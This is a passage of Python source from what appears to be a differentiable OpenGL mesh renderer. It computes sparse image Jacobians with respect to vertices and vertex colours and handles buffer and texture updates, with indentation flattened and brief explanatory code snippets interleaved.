# rows = np.tile(np.arange(d_final_outside.shape[0])[None, :], [2, 1]).T.ravel()
# cols = np.arange(d_final_outside.shape[0] * 2)
#
# dwdv_r_v1 = np.array(dwdv[rows, cols]).reshape([-1, 2])
#
# dwdv = d_final_outside.dr_wrt(chEdgeVerts2)
# rows = np.tile(np.arange(d_final_ch.shape[0])[None, :], [2, 1]).T.ravel()
# cols = np.arange(d_final_ch.shape[0] * 2)
#
# dwdv_r_v2 = np.array(dwdv[rows, cols]).reshape([-1, 2])
nonIntersect = self.nonIntersect
argminDistNonIntersect = self.argminDistNonIntersect
max_dx_dy = np.maximum(np.abs(n_norm[:, 0]), np.abs(n_norm[:, 1]))
# d_final_np = dist / max_dx_dy
d_final_np = dist
ident = np.identity(2)
ident = np.tile(ident[None, :], [len(p2), 1, 1])
dlnorm = (ident - np.einsum('ij,ik->ijk', lnorm, lnorm)) / linedist[:, None]
dl_normdp1 = np.einsum('ijk,ikl->ijl', dlnorm, -ident)
dl_normdp2 = np.einsum('ijk,ikl->ijl', dlnorm, ident)
dv1dp1 = -ident
dv1dp2 = 0
dddp1 = np.einsum('ijk,ij->ik', dv1dp1, lnorm) + np.einsum('ij,ijl->il', v1, dl_normdp1)
dddp2 = 0 + np.einsum('ij,ijl->il', v1, dl_normdp2)
dipdp1 = ident + (dddp1[:,None,:]*lnorm[:,:,None]) + d[:,None,None]*dl_normdp1
dipdp2 = (dddp2[:,None,:]*lnorm[:,:,None]) + d[:,None,None]*dl_normdp2
dndp1 = -dipdp1
dndp2 = -dipdp2
dn_norm = (ident - np.einsum('ij,ik->ijk', n_norm, n_norm)) / dist[:,None]
dn_normdp1 = np.einsum('ijk,ikl->ijl', dn_norm, dndp1)
dn_normdp2 = np.einsum('ijk,ikl->ijl', dn_norm, dndp2)
ddistdp1 = np.einsum('ij,ijl->il', n_norm, dndp1)
ddistdp2 = np.einsum('ij,ijl->il', n_norm, dndp2)
argmax_nx_ny = np.argmax(np.abs(n_norm),axis=1)
dmax_nx_ny_p1 = np.sign(n_norm)[np.arange(len(n_norm)),argmax_nx_ny][:,None]*dn_normdp1[np.arange(len(dn_normdp1)),argmax_nx_ny]
dmax_nx_ny_p2 = np.sign(n_norm)[np.arange(len(n_norm)),argmax_nx_ny][:,None]*dn_normdp2[np.arange(len(dn_normdp2)),argmax_nx_ny]
# dd_final_dp1 = -1./max_dx_dy[:,None]**2 * dmax_nx_ny_p1 * dist + 1./max_dx_dy[:,None] * ddistdp1
# dd_final_dp2 = -1./max_dx_dy[:,None]**2 * dmax_nx_ny_p2 * dist + 1./max_dx_dy[:,None] * ddistdp2
dd_final_dp1 = ddistdp1
dd_final_dp2 = ddistdp2
#For those non intersecting points straight to the edge:
v1 = self.v1[nonIntersect][argminDistNonIntersect==0]
v1_norm = v1/np.sqrt((np.sum(v1**2,axis=1)))[:,None]
dd_final_dp1_nonintersect = -v1_norm
v2 = self.v2[nonIntersect][argminDistNonIntersect==1]
v2_norm = v2/np.sqrt((np.sum(v2**2,axis=1)))[:,None]
dd_final_dp2_nonintersect = -v2_norm
# Chained fancy indexing (a[mask][mask2] = x) assigns into a copy; index directly instead:
nonIntersectIdx = np.where(nonIntersect)[0]
dd_final_dp1[nonIntersectIdx[argminDistNonIntersect == 0]] = dd_final_dp1_nonintersect
dd_final_dp1[nonIntersectIdx[argminDistNonIntersect == 1]] = 0
dd_final_dp2[nonIntersectIdx[argminDistNonIntersect == 1]] = dd_final_dp2_nonintersect
dd_final_dp2[nonIntersectIdx[argminDistNonIntersect == 0]] = 0
dImage_wrt_outside_v1 = finalColorBndOutside_for_dr[facesOutsideBnd][:,:,None]*dd_final_dp1[:,None,:] - dd_final_dp1[:,None,:]*finalColorBndOutside_edge_for_dr[facesOutsideBnd][:,:,None]
dImage_wrt_outside_v2 = finalColorBndOutside_for_dr[facesOutsideBnd][:,:,None]*dd_final_dp2[:,None,:] - dd_final_dp2[:,None,:]*finalColorBndOutside_edge_for_dr[facesOutsideBnd][:,:,None]
### Derivatives wrt V:
pixels = np.tile(np.where(boundaryImage.ravel())[0][None, :], [self.nsamples, 1])[facesOutsideBnd]
IS = np.tile(col(pixels), (1, 2*2)).ravel()
# faces = f[sampleFaces[facesOutsideBnd]].ravel()
faces = self.vpe[edge_visibility.ravel()[(zerosIm * boundaryImage).ravel().astype(bool)]].ravel()
faces = np.tile(faces.reshape([1, -1, 2]), [self.nsamples, 1, 1])[facesOutsideBnd].ravel()
JS = col(faces)
JS = np.hstack((JS*2, JS*2+1)).ravel()
if n_channels > 1:
IS = np.concatenate([IS*n_channels+i for i in range(n_channels)])
JS = np.concatenate([JS for i in range(n_channels)])
data1 = dImage_wrt_outside_v1.transpose([1,0,2])
data2 = dImage_wrt_outside_v2.transpose([1,0,2])
data = np.concatenate([data1[:,:,None,:], data2[:,:,None,:]], 2)
data = data.ravel()
ij = np.vstack((IS.ravel(), JS.ravel()))
result_wrt_verts_bnd_outside = sp.csc_matrix((data, ij), shape=(image_width*image_height*n_channels, num_verts*2))
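The `(data, ij)` constructor used throughout this method follows COO semantics: repeated `(row, col)` pairs are summed on construction, which is exactly how per-sample gradient contributions accumulate into one Jacobian. A small sketch with made-up indices:

```python
import numpy as np
import scipy.sparse as sp

data = np.array([1.0, 2.0, 5.0])
IS = np.array([0, 0, 1])   # rows (e.g. pixel indices); (0, 3) appears twice
JS = np.array([3, 3, 2])   # cols (e.g. vertex-coordinate indices)
J = sp.csc_matrix((data, np.vstack((IS, JS))), shape=(2, 4))
assert J[0, 3] == 3.0      # duplicated entries summed: 1.0 + 2.0
assert J[1, 2] == 5.0
```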
######## 2 derivatives samples outside wrt v bar outside: (w * (dbar*vc) )/ nsamples for faces sample
######## 6 derivatives samples inside wrt v : (dbar'*vc')/ nsamples for faces sample
verticesBnd = self.v.r[f[sampleFaces.ravel()].ravel()].reshape([-1, 3])
sampleBarycentricBar = self.renders_sample_barycentric.reshape([nsamples, -1, 3])[:, (zerosIm * boundaryImage).ravel().astype(bool), :].reshape([-1, 3, 1])
verts = np.sum(self.v.r[f[sampleFaces.ravel()].ravel()].reshape([-1, 3, 3]) * sampleBarycentricBar, axis=1)
dImage_wrt_bar_v = self.barycentricDerivatives(verticesBnd, f[sampleFaces.ravel()], verts).swapaxes(0,1)
dImage_wrt_bar_v[facesOutsideBnd.ravel()] = dImage_wrt_bar_v[facesOutsideBnd.ravel()] * d_final_outside[:,None,None, None] * self.t_area_bnd_outside[:, None, None, None]
dImage_wrt_bar_v[facesInsideBnd.ravel()] = dImage_wrt_bar_v[facesInsideBnd.ravel()] * self.t_area_bnd_inside[:, None, None, None]
# dImage_wrt_bar_v /= np.tile(areaWeightsTotal[None,:], [self.nsamples,1]).ravel()[:, None,None, None]
dImage_wrt_bar_v /= self.nsamples
### Derivatives wrt V: 2 derivatives samples outside wrt v bar outside: (w * (dbar*vc) )/ nsamples for faces sample
# IS = np.tile(col(visible), (1, 2*f.shape[1])).ravel()
pixels = np.tile(np.where(boundaryImage.ravel())[0][None, :], [self.nsamples, 1])[facesOutsideBnd]
IS = np.tile(col(pixels), (1, 2*f.shape[1])).ravel()
faces = f[sampleFaces[facesOutsideBnd]].ravel()
JS = col(faces)
JS = np.hstack((JS*2, JS*2+1)).ravel()
if n_channels > 1:
IS = np.concatenate([IS*n_channels+i for i in range(n_channels)])
JS = np.concatenate([JS for i in range(n_channels)])
# data = np.tile(dImage_wrt_bar_v[facesOutsideBnd.ravel()][None,:],[3,1,1,1]).ravel()
data = np.transpose(dImage_wrt_bar_v[facesOutsideBnd.ravel()],[1,0,2,3]).ravel()
ij = np.vstack((IS.ravel(), JS.ravel()))
result_wrt_verts_bar_outside = sp.csc_matrix((data, ij), shape=(image_width*image_height*n_channels, num_verts*2))
### Derivatives wrt V: 6 derivatives samples inside wrt v : (dbar'*vc')/ nsamples for faces sample
# IS = np.tile(col(visible), (1, 2*f.shape[1])).ravel()
pixels = np.tile(np.where(boundaryImage.ravel())[0][None, :], [self.nsamples, 1])[facesInsideBnd]
IS = np.tile(col(pixels), (1, 2*f.shape[1])).ravel()
faces = f[sampleFaces[facesInsideBnd]].ravel()
JS = col(faces)
JS = np.hstack((JS*2, JS*2+1)).ravel()
if n_channels > 1:
IS = np.concatenate([IS*n_channels+i for i in range(n_channels)])
JS = np.concatenate([JS for i in range(n_channels)])
data = np.transpose(dImage_wrt_bar_v[facesInsideBnd.ravel()], [1, 0, 2, 3]).ravel()
ij = np.vstack((IS.ravel(), JS.ravel()))
result_wrt_verts_bar_inside = sp.csc_matrix((data, ij), shape=(image_width*image_height*n_channels, num_verts*2))
####### 3 derivatives samples outside wrt v bar edge: (1-w) (dbar'*vc') )/ nsamples for faces edge (barv1', barv2', 0)
frontFacing = self.frontFacingEdgeFaces[(zerosIm * boundaryImage).ravel().astype(bool)].astype(bool)
frontFacingEdgeFaces = self.fpe[edge_visibility.ravel()[(zerosIm * boundaryImage).ravel().astype(bool)]][frontFacing]
verticesBnd = self.v.r[f[frontFacingEdgeFaces.ravel()].ravel()].reshape([1, -1, 3])
verticesBnd = np.tile(verticesBnd, [self.nsamples, 1,1])
verticesBnd = verticesBnd.reshape([-1,3,3])[facesOutsideBnd.ravel()].reshape([-1,3])
verts = self.viewPointIntersect
fFrontEdge = np.tile(f[frontFacingEdgeFaces][None,:], [self.nsamples, 1, 1]).reshape([-1,3])[facesOutsideBnd.ravel()]
dImage_wrt_bar_v_edge = self.barycentricDerivatives(verticesBnd, fFrontEdge, verts).swapaxes(0, 1)
dImage_wrt_bar_v_edge = dImage_wrt_bar_v_edge * (1-d_final_outside[:,None,None, None]) * self.t_area_bnd_edge[:, None, None, None]
# dImage_wrt_bar_v_edge /= np.tile(self.areaWeightsTotal[None,:], [self.nsamples,1])[facesOutsideBnd][:, None, None,None]
dImage_wrt_bar_v_edge /= self.nsamples
### Derivatives wrt V:
pixels = np.tile(np.where(boundaryImage.ravel())[0][None, :], [self.nsamples, 1])[facesOutsideBnd]
IS = np.tile(col(pixels), (1, 3 * 2)).ravel()
# faces = self.vpe[edge_visibility.ravel()[(zerosIm * boundaryImage).ravel().astype(np.bool)]].ravel()
faces = f[frontFacingEdgeFaces]
faces = np.tile(faces.reshape([1, -1, 3]), [self.nsamples, 1, 1])[facesOutsideBnd].ravel()
JS = col(faces)
JS = np.hstack((JS*2, JS*2+1)).ravel()
if n_channels > 1:
IS = np.concatenate([IS*n_channels+i for i in range(n_channels)])
JS = np.concatenate([JS for i in range(n_channels)])
data = np.transpose(dImage_wrt_bar_v_edge, [1, 0, 2, 3]).ravel()
ij = np.vstack((IS.ravel(), JS.ravel()))
result_wrt_verts_bar_outside_edge = sp.csc_matrix((data, ij), shape=(image_width*image_height*n_channels, num_verts*2))
########### Non boundary derivatives: ####################
nNonBndFaces = nonBoundaryFaces.size
verticesNonBnd = self.v.r[f[nonBoundaryFaces].ravel()]
vertsPerFaceProjBnd = self.camera.r[f[nonBoundaryFaces].ravel()].reshape([-1,3,2])
nv = len(vertsPerFaceProjBnd)
p0_proj = np.c_[vertsPerFaceProjBnd[:, 0, :], np.ones([nv, 1])]
p1_proj = np.c_[vertsPerFaceProjBnd[:, 1, :], np.ones([nv, 1])]
p2_proj = np.c_[vertsPerFaceProjBnd[:, 2, :], np.ones([nv, 1])]
t_area_nonbnd = np.abs(np.linalg.det(np.concatenate([p0_proj[:, None], p1_proj[:, None], p2_proj[:, None]], axis=1)) * 0.5)
t_area_nonbnd[t_area_nonbnd> 1] = 1
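The area term above is the standard homogeneous-coordinate formula: half the absolute determinant of the 3x3 matrix whose rows are (x, y, 1). A self-contained check on a right triangle with legs 2 and 3:

```python
import numpy as np

p0 = np.array([0.0, 0.0, 1.0])
p1 = np.array([2.0, 0.0, 1.0])
p2 = np.array([0.0, 3.0, 1.0])
# 0.5 * |det([p0; p1; p2])| is the signed-area formula made unsigned
area = np.abs(np.linalg.det(np.stack([p0, p1, p2])) * 0.5)
assert np.isclose(area, 3.0)
```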
bc = barycentric[((~boundaryImage)&(visibility !=4294967295 ))].reshape((-1, 3))
verts = np.sum(self.v.r[f[nonBoundaryFaces.ravel()].ravel()].reshape([-1, 3, 3]) * bc[:, :,None], axis=1)
didp = self.barycentricDerivatives(verticesNonBnd, f[nonBoundaryFaces.ravel()], verts)
didp = didp * t_area_nonbnd[None,:,None, None]
n_channels = np.atleast_3d(observed).shape[2]
shape = visibility.shape
####### 2: Take the data and copy the corresponding dxs and dys to these new pixels.
### Derivatives wrt V:
# IS = np.tile(col(visible), (1, 2*f.shape[1])).ravel()
pixels = np.where(((~boundaryImage)&(visibility !=4294967295 )).ravel())[0]
IS = np.tile(col(pixels), (1, 2*f.shape[1])).ravel()
JS = col(f[nonBoundaryFaces].ravel())
JS = np.hstack((JS*2, JS*2+1)).ravel()
if n_channels > 1:
IS = np.concatenate([IS*n_channels+i for i in range(n_channels)])
JS = np.concatenate([JS for i in range(n_channels)])
# data = np.concatenate(((visTriVC[:,0,:] * dBar1dx[:,None])[:,:,None],(visTriVC[:, 0, :] * dBar1dy[:, None])[:,:,None], (visTriVC[:,1,:]* dBar2dx[:,None])[:,:,None], (visTriVC[:, 1, :] * dBar2dy[:, None])[:,:,None],(visTriVC[:,2,:]* dBar3dx[:,None])[:,:,None],(visTriVC[:, 2, :] * dBar3dy[:, None])[:,:,None]),axis=2).swapaxes(0,1).ravel()
data = didp.ravel()
ij = np.vstack((IS.ravel(), JS.ravel()))
result_wrt_verts_nonbnd = sp.csc_matrix((data, ij), shape=(image_width*image_height*n_channels, num_verts*2))
# result_wrt_verts_nonbnd.sum_duplicates()
if np.any(boundaryImage):
result_wrt_verts = result_wrt_verts_bnd_outside + result_wrt_verts_bar_outside + result_wrt_verts_bar_inside + result_wrt_verts_bar_outside_edge + result_wrt_verts_nonbnd
# result_wrt_verts = result_wrt_verts_bnd_outside
else:
result_wrt_verts = result_wrt_verts_nonbnd
return result_wrt_verts
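Several places above interpolate a point from its barycentric weights via `np.sum(tri_verts * bar, axis=...)`; a minimal sketch of that contraction on one toy triangle:

```python
import numpy as np

tri = np.array([[0.0, 0.0, 0.0],
                [1.0, 0.0, 0.0],
                [0.0, 1.0, 0.0]])   # 3 vertices x 3 coords
bar = np.array([0.2, 0.3, 0.5])     # barycentric weights, sum to 1
# weighted sum of the three vertices recovers the interpolated point
point = np.sum(tri * bar[:, None], axis=0)
assert np.allclose(point, [0.3, 0.5, 0.0])
```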
def compute_derivatives_vc(self, observed, visible, visibility, barycentric, image_width, image_height, num_verts, f):
width = self.frustum['width']
height = self.frustum['height']
num_channels = 3
n_channels = num_channels
vc_size = self.vc.size
d_final_outside = self.d_final_outside
barycentricVertsIntersect = self.barycentricVertsIntersect
boundaryImage = self.boundarybool_image.astype(bool) & (visibility != 4294967295)
zerosIm = np.ones(self.boundarybool_image.shape).astype(bool)
edge_visibility = self.boundaryid_image
vertsProjBnd = self.camera.r[self.vpe[edge_visibility.ravel()[(zerosIm * boundaryImage).ravel().astype(bool)]].ravel()].reshape([-1, 2, 2])
nsamples = self.nsamples
sampleFaces = self.renders_faces.reshape([nsamples, -1])[:, (zerosIm * boundaryImage).ravel().astype(bool)].reshape([nsamples, -1]) - 1
sampleBarycentric = self.renders_sample_barycentric.reshape([nsamples, -1, 3])[:, (zerosIm * boundaryImage).ravel().astype(bool), :].reshape([nsamples, -1, 3])
nonBoundaryFaces = visibility[zerosIm * (~boundaryImage)&(visibility !=4294967295 )]
if np.any(boundaryImage):
boundaryFaces = visibility[boundaryImage]
nBndFaces = len(boundaryFaces)
projFacesBndTiled = np.tile(boundaryFaces[None, :], [self.nsamples, 1])
facesInsideBnd = projFacesBndTiled == sampleFaces
facesOutsideBnd = ~facesInsideBnd
# vertsProjBnd[None, :] - sampleV[:,None,:]
vertsProjBndSamples = np.tile(vertsProjBnd[None, :], [self.nsamples, 1,1,1])
vertsProjBndSamplesOutside = vertsProjBndSamples[facesOutsideBnd]
#Computing gradients:
#A multisampled pixel color is given by: w R + (1-w) R' thus:
#1 derivatives samples outside wrt v 1: (dw * (svc) - dw (bar'*vc') )/ nsamples for face sample
#2 derivatives samples outside wrt v bar outside: (w * (dbar*vc) )/ nsamples for faces sample
#3 derivatives samples outside wrt v bar edge: (1-w) (dbar'*vc') )/ nsamples for faces edge (barv1', barv2', 0)
#4 derivatives samples outside wrt vc : (w * (bar) )/ nsamples for faces sample
#5 derivatives samples outside wrt vc : (1-w) (bar')/ nsamples for faces edge
#6 derivatives samples inside wrt v : (dbar'*vc')/ nsamples for faces sample
#7 derivatives samples inside wrt vc : (bar)/ nsamples for faces sample
#for every boundary pixel i,j we have list of sample faces. compute gradients at each and sum them according to face identity, options:
# - Best: create sparse matrix for every matrix. sum them! same can be done with boundary.
####### 4 derivatives samples outside wrt vc : (w * (bar) )/ nsamples for faces sample
dImage_wrt_outside_vc_outside = d_final_outside[:,None] * sampleBarycentric[facesOutsideBnd] / self.nsamples
### Derivatives wrt VC:
# Each pixel relies on three verts
pixels = np.tile(np.where(boundaryImage.ravel())[0][None,:], [self.nsamples, 1])[facesOutsideBnd]
IS = np.tile(col(pixels), (1, 3)).ravel()
faces = f[sampleFaces[facesOutsideBnd]].ravel()
JS = col(faces)
data = dImage_wrt_outside_vc_outside.ravel()
IS = np.concatenate([IS * num_channels + k for k in range(num_channels)])
JS = np.concatenate([JS * num_channels + k for k in range(num_channels)])
data = np.concatenate([data for i in range(num_channels)])
ij = np.vstack((IS.ravel(), JS.ravel()))
result = sp.csc_matrix((data, ij), shape=(width * height * num_channels, vc_size))
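The channel expansion used for `IS`/`JS` above maps pixel `p`, channel `k` to row `p*n + k` and vertex entry `j`, channel `k` to column `j*n + k`; a tiny sketch with invented indices:

```python
import numpy as np

num_channels = 3
IS = np.array([0, 2])
JS = np.array([5, 7])
# one copy of the index lists per channel, offset by the channel number
IS3 = np.concatenate([IS * num_channels + k for k in range(num_channels)])
JS3 = np.concatenate([JS * num_channels + k for k in range(num_channels)])
assert IS3.tolist() == [0, 6, 1, 7, 2, 8]
assert JS3.tolist() == [15, 21, 16, 22, 17, 23]
```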
result_wrt_vc_bnd_outside = result
# result_wrt_vc_bnd_outside.sum_duplicates()
######## 5 derivatives samples outside wrt vc : (1-w) (bar')/ nsamples for faces edge
dImage_wrt_outside_vc_edge = (1-d_final_outside[:, None]) * np.c_[barycentricVertsIntersect, 1-barycentricVertsIntersect] / self.nsamples
### Derivatives wrt VC:
# Each pixel relies on the two edge endpoints
pixels = np.tile(np.where(boundaryImage.ravel())[0][None,:], [self.nsamples, 1])[facesOutsideBnd]
IS = np.tile(col(pixels), (1, 2)).ravel()
faces = self.vpe[edge_visibility.ravel()[(zerosIm * boundaryImage).ravel().astype(bool)]].ravel()
faces = np.tile(faces.reshape([1,-1,2]),[self.nsamples, 1, 1])[facesOutsideBnd].ravel()
JS = col(faces)
data = dImage_wrt_outside_vc_edge.ravel()
IS = np.concatenate([IS * num_channels + k for k in range(num_channels)])
JS = np.concatenate([JS * num_channels + k for k in range(num_channels)])
data = np.concatenate([data for i in range(num_channels)])
ij = np.vstack((IS.ravel(), JS.ravel()))
result_wrt_vc_bnd_outside_edge = sp.csc_matrix((data, ij), shape=(width * height * num_channels, vc_size))
# result_wrt_vc_bnd_outside_edge.sum_duplicates()
######## 7 derivatives samples inside wrt vc : (bar)/ nsamples for faces sample
dImage_wrt_outside_vc_inside = sampleBarycentric[facesInsideBnd] / self.nsamples
### Derivatives wrt VC:
# Each pixel relies on three verts
pixels = np.tile(np.where(boundaryImage.ravel())[0][None,:], [self.nsamples, 1])[facesInsideBnd]
IS = np.tile(col(pixels), (1, 3)).ravel()
faces = f[sampleFaces[facesInsideBnd]].ravel()
JS = col(faces)
data = dImage_wrt_outside_vc_inside.ravel()
IS = np.concatenate([IS * num_channels + k for k in range(num_channels)])
JS = np.concatenate([JS * num_channels + k for k in range(num_channels)])
data = np.concatenate([data for i in range(num_channels)])
ij = np.vstack((IS.ravel(), JS.ravel()))
result_wrt_vc_bnd_inside = sp.csc_matrix((data, ij), shape=(width * height * num_channels, vc_size))
# result_wrt_vc_bnd_inside.sum_duplicates()
########### Non boundary derivatives: ####################
nNonBndFaces = nonBoundaryFaces.size
verticesNonBnd = self.v.r[f[nonBoundaryFaces].ravel()]
# barySample = self.renders_sample_barycentric[0].reshape([-1,3])[(~boundaryImage)&(visibility !=4294967295 ).ravel().astype(np.bool), :]
bc = barycentric[((~boundaryImage)&(visibility !=4294967295 ))].reshape((-1, 3))
# barySample[barycentric[((~boundaryImage)&(visibility !=4294967295 ))].reshape((-1, 3))]
### Derivatives wrt VC:
# Each pixel relies on three verts
pixels = np.where(((~boundaryImage)&(visibility !=4294967295 )).ravel())[0]
IS = np.tile(col(pixels), (1, 3)).ravel()
JS = col(f[nonBoundaryFaces].ravel())
data = np.asarray(bc, order='C').ravel()
IS = np.concatenate([IS * num_channels + k for k in range(num_channels)])
JS = np.concatenate([JS * num_channels + k for k in range(num_channels)])
data = np.concatenate([data for i in range(num_channels)])
# IS = np.concatenate((IS*3, IS*3+1, IS*3+2))
# JS = np.concatenate((JS*3, JS*3+1, JS*3+2))
# data = np.concatenate((data, data, data))
ij = np.vstack((IS.ravel(), JS.ravel()))
result = sp.csc_matrix((data, ij), shape=(width * height * num_channels, vc_size))
result_wrt_vc_nonbnd = result
# result_wrt_vc_nonbnd.sum_duplicates()
if np.any(boundaryImage):
# result_wrt_verts = result_wrt_verts_bar_outside_edge
# result_wrt_verts = result_wrt_verts_nonbnd
result_wrt_vc = result_wrt_vc_bnd_outside + result_wrt_vc_bnd_outside_edge + result_wrt_vc_bnd_inside + result_wrt_vc_nonbnd
# result_wrt_vc = sp.csc_matrix((width * height * num_channels, vc_size))
else:
# result_wrt_verts = sp.csc_matrix((image_width*image_height*n_channels, num_verts*2))
result_wrt_vc = result_wrt_vc_nonbnd
# result_wrt_vc = sp.csc_matrix((width * height * num_channels, vc_size))
return result_wrt_vc
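The gradient cases enumerated in the comments of the method above all derive from the multisample model C = w*R + (1-w)*R'. A toy numeric check of those partials (illustrative scalar values only):

```python
import numpy as np

def sample_color(w, R, R_edge):
    # multisampled pixel contribution: w * face color + (1 - w) * edge color
    return w * R + (1.0 - w) * R_edge

w, R, R_edge = 0.6, 0.9, 0.3
eps = 1e-6
dC_dw = R - R_edge    # analytic partial wrt the coverage weight
dC_dR = w             # analytic partial wrt the face color
dC_dRe = 1.0 - w      # analytic partial wrt the edge color
# central finite differences agree with the analytic partials
assert np.isclose(dC_dw, (sample_color(w + eps, R, R_edge) - sample_color(w - eps, R, R_edge)) / (2 * eps))
assert np.isclose(dC_dR, (sample_color(w, R + eps, R_edge) - sample_color(w, R - eps, R_edge)) / (2 * eps))
assert np.isclose(dC_dRe, (sample_color(w, R, R_edge + eps) - sample_color(w, R, R_edge - eps)) / (2 * eps))
```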
def on_changed(self, which):
super().on_changed(which)
if 'v' in which or 'camera' in which:
for mesh in range(len(self.f_list)):
for polygons in range(len(self.f_list[mesh])):
f = self.f_list[mesh][polygons]
verts_by_face = np.asarray(self.v_list[mesh].reshape((-1, 3))[f.ravel()], dtype=np.float32, order='C')
self.vbo_verts_mesh[mesh][polygons].set_array(verts_by_face.astype(np.float32))
self.vbo_verts_mesh[mesh][polygons].bind()
if 'vc' in which:
for mesh in range(len(self.f_list)):
for polygons in range(len(self.f_list[mesh])):
f = self.f_list[mesh][polygons]
colors_by_face = np.asarray(self.vc_list[mesh].reshape((-1, 3))[f.ravel()], dtype=np.float32, order='C')
self.vbo_colors_mesh[mesh][polygons].set_array(colors_by_face.astype(np.float32))
self.vbo_colors_mesh[mesh][polygons].bind()
if 'f' in which:
self.vbo_indices.set_array(self.f.astype(np.uint32))
self.vbo_indices.bind()
self.vbo_indices_range.set_array(np.arange(self.f.size, dtype=np.uint32).ravel())
self.vbo_indices_range.bind()
flen = 1
for mesh in range(len(self.f_list)):
for polygons in range(len(self.f_list[mesh])):
f = self.f_list[mesh][polygons]
# fc = np.arange(flen, flen + len(f))
fc = np.tile(np.arange(flen, flen + len(f))[:, None], [1, 3]).ravel()
# fc[:, 0] = fc[:, 0] & 255
# fc[:, 1] = (fc[:, 1] >> 8) & 255
# fc[:, 2] = (fc[:, 2] >> 16) & 255
fc = np.asarray(fc, dtype=np.uint32)
self.vbo_face_ids_list[mesh][polygons].set_array(fc)
self.vbo_face_ids_list[mesh][polygons].bind()
flen += len(f)
self.vbo_indices_mesh_list[mesh][polygons].set_array(np.array(self.f_list[mesh][polygons]).astype(np.uint32))
self.vbo_indices_mesh_list[mesh][polygons].bind()
if 'texture_stack' in which:
# gl = self.glf
# texture_data = np.array(self.texture_image*255., dtype='uint8', order='C')
# self.release_textures()
#
# for mesh in range(len(self.f_list)):
# textureIDs = []
# for polygons in range(len(self.f_list[mesh])):
# texture = None
# if self.haveUVs_list[mesh][polygons]:
# texture = GL.GLuint(0)
# GL.glGenTextures( 1, texture )
# GL.glPixelStorei(GL.GL_UNPACK_ALIGNMENT,1)
# GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAG_FILTER, GL.GL_LINEAR)
# GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR_MIPMAP_LINEAR)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_BASE_LEVEL, 0)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAX_LEVEL, 0)
# GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_WRAP_S, GL.GL_REPEAT)
# GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_WRAP_T, GL.GL_REPEAT)
# GL.glBindTexture(GL.GL_TEXTURE_2D, texture)
# #Send texture.
# #Pol: Check if textures are float or uint from Blender import.
# image = (self.textures_list[mesh][polygons]*255.0).astype(np.uint8)
# GL.glTexImage2D(GL.GL_TEXTURE_2D, 0, GL.GL_RGB8, image.shape[1], image.shape[0], 0, GL.GL_RGB, GL.GL_UNSIGNED_BYTE, image)
# textureIDs = textureIDs + [texture]
# self.textureID_mesh_list = self.textureID_mesh_list + [textureIDs]
# gl.GenTextures(1, tmp) # TODO: free after done
# self.textureID = tmp[0]
if self.initialized:
textureCoordIdx = 0
for mesh in range(len(self.f_list)):
for polygons in range(len(self.f_list[mesh])):
texture = None
if self.haveUVs_list[mesh][polygons]:
texture = self.textureID_mesh_list[mesh][polygons]
GL.glBindTexture(GL.GL_TEXTURE_2D, texture)
#Update the OpenGL textures with all the textures. (Inefficient as many might not have changed).
image = np.array(np.flipud((self.textures_list[mesh][polygons] * 255.0)), order='C', dtype=np.uint8)
self.textures_list[mesh][polygons] = self.texture_stack[textureCoordIdx:image.size+textureCoordIdx].reshape(image.shape)
textureCoordIdx = textureCoordIdx + image.size
image = np.array(np.flipud((self.textures_list[mesh][polygons] * 255.0)), order='C', dtype=np.uint8)
GL.glTexSubImage2D(GL.GL_TEXTURE_2D, 0, 0, 0, image.shape[1], image.shape[0], GL.GL_RGB, GL.GL_UNSIGNED_BYTE, image.tobytes())
if any(attr in which for attr in ('v', 'f', 'vc', 'ft', 'camera', 'texture_stack')):
self.render_image_buffers()
def release_textures(self):
if hasattr(self, 'textureID_mesh_list'):
if self.textureID_mesh_list != []:
for texture_mesh in self.textureID_mesh_list:
if texture_mesh != []:
for texture in texture_mesh:
if texture != None:
GL.glDeleteTextures(1, [texture.value])
self.textureID_mesh_list = []
@depends_on(dterms+terms)
def color_image(self):
self._call_on_changed()
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
no_overdraw = self.draw_color_image(with_vertex_colors=True, with_texture_on=True)
return no_overdraw
# if not self.overdraw:
# return no_overdraw
#
# GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_LINE)
# overdraw = self.draw_color_image()
# GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
#
# # return overdraw * np.atleast_3d(self.boundarybool_image)
#
# boundarybool_image = self.boundarybool_image
# if self.num_channels > 1:
# boundarybool_image = np.atleast_3d(boundarybool_image)
#
# return np.asarray((overdraw*boundarybool_image + no_overdraw*(1-boundarybool_image)), order='C')
@depends_on('f', 'frustum', 'camera', 'overdraw')
def barycentric_image(self):
self._call_on_changed()
# Overload method to call without overdraw.
return self.draw_barycentric_image(self.boundarybool_image if self.overdraw else None)
@depends_on('f', 'frustum', 'camera', 'overdraw')
def visibility_image(self):
self._call_on_changed()
#Overload method to call without overdraw.
return self.draw_visibility_image(self.v.r, self.f, self.boundarybool_image if self.overdraw else None)
def image_mesh_bool(self, meshes):
self.makeCurrentContext()
self._call_on_changed()
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
self._call_on_changed()
GL.glClearColor(0.,0.,0., 1.)
# use face colors if given
# FIXME: this won't work for 2 channels
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
GL.glUseProgram(self.colorProgram)
for mesh in meshes:
self.draw_index(mesh)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo)
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
result = np.flipud(np.frombuffer(GL.glReadPixels( 0,0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_UNSIGNED_BYTE), np.uint8).reshape(self.frustum['height'],self.frustum['width'],3).astype(np.uint32))[:,:,0]
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
return result!=0
